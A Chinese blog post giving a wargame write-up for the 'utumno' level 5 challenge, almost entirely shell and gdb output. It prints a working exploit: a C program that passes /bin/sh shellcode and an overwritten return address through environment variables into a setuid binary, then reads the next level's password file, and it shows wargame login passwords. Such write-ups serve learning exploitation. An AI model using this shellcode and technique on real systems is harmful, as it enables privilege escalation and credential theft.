utumno - 5

最新推荐文章于 2016-04-13 15:02:39 发布

shuimuyq

最新推荐文章于 2016-04-13 15:02:39 发布

阅读量701

点赞数

CC 4.0 BY-SA版权

分类专栏： wargames wargames-writeup

本文链接：https://blog.youkuaiyun.com/shuimuyq/article/details/51143340

wargames-writeup 同时被 2 个专栏收录

26 篇文章

订阅专栏

wargames

25 篇文章

订阅专栏

root@today:~/Desktop/misc/utumno/utumno5# ssh utumno5@178.79.134.250

utumno5@178.79.134.250's password: woucaejiek

utumno5@melinda:~$ mkdir /tmp/utu5

utumno5@melinda:~$ cd /tmp/utu5

utumno5@melinda:/tmp/utu5$ cat hacker.c

#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
 
int main(int argc, char *argv[])
{ 
	char *arg[] = {0x00}; 
	char *envp[] = {  
		"", 
		"", 
		"", 
		"", 
		"", 
		"", 
		"", 
		"", 

		"\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80",

		"UUUUUUUUUUUUUUUU\xba\xdf\xff\xff", 
		 
		NULL 
	};

	execve("/utumno/utumno5", arg, envp); 
	perror("execve"); 
	exit(1); 
}

utumno5@melinda:/tmp/utu5$ gcc hacker.c -o hacker -m32 -g

utumno5@melinda:/tmp/utu5$ gdb -tui hacker
(gdb) b *main
Breakpoint 1 at 0x804847d: file hacker.c, line 6.
(gdb) run
Starting program: /tmp/utu5/hacker 

Breakpoint 1, main (argc=1, argv=0xffffd684) at hacker.c:6
(gdb) c
Continuing.
process 23083 is executing new program: /games/utumno/utumno5

Breakpoint 1, main (argc=0, argv=0xffffdec4) at utumno5.c:38
(gdb) ni
(gdb) ni  
(gdb) x/24dbx $ebp
0xffffde28:     0x00    0x00    0x00    0x00    0x63    0xda    0xe3    0xf7
0xffffde30:     0x00    0x00    0x00    0x00    0xc4    0xde    0xff    0xff
0xffffde38:     0xc8    0xde    0xff    0xff    0xea    0xac    0xfe    0xf7

#0x0c(%ebp) = 0xffffdec4

(gdb) x/48dbx 0xffffdec4
0xffffdec4:     0x00    0x00    0x00    0x00    0xb2    0xdf    0xff    0xff
0xffffdecc:     0xb3    0xdf    0xff    0xff    0xb4    0xdf    0xff    0xff
0xffffded4:     0xb5    0xdf    0xff    0xff    0xb6    0xdf    0xff    0xff
0xffffdedc:     0xb7    0xdf    0xff    0xff    0xb8    0xdf    0xff    0xff
0xffffdee4:     0xb9    0xdf    0xff    0xff    0xba    0xdf    0xff    0xff
0xffffdeec:     0xd3    0xdf    0xff    0xff    0x00    0x00    0x00    0x00

(gdb) x/24dbx 0xffffdfba
0xffffdfba:     0x6a    0x0b    0x58    0x31    0xf6    0x56    0x68    0x2f
0xffffdfc2:     0x2f    0x73    0x68    0x68    0x2f    0x62    0x69    0x6e
0xffffdfca:     0x89    0xe3    0x31    0xc9    0x89    0xca    0xcd    0x80

(gdb) x/24dbx 0xffffdfd3
0xffffdfd3:     0x55    0x55    0x55    0x55    0x55    0x55    0x55    0x55
0xffffdfdb:     0x55    0x55    0x55    0x55    0x55    0x55    0x55    0x55
0xffffdfe3:     0xba    0xdf    0xff    0xff    0x00    0x2f    0x75    0x74

utumno5@melinda:/tmp/utu5$ ./hacker 
Here we go - UUUUUUUUUUUUUUUU锟斤拷锟斤拷
$ whoami
utumno6
$ cat /etc/utumno_pass/utumno6
eiluquieth
$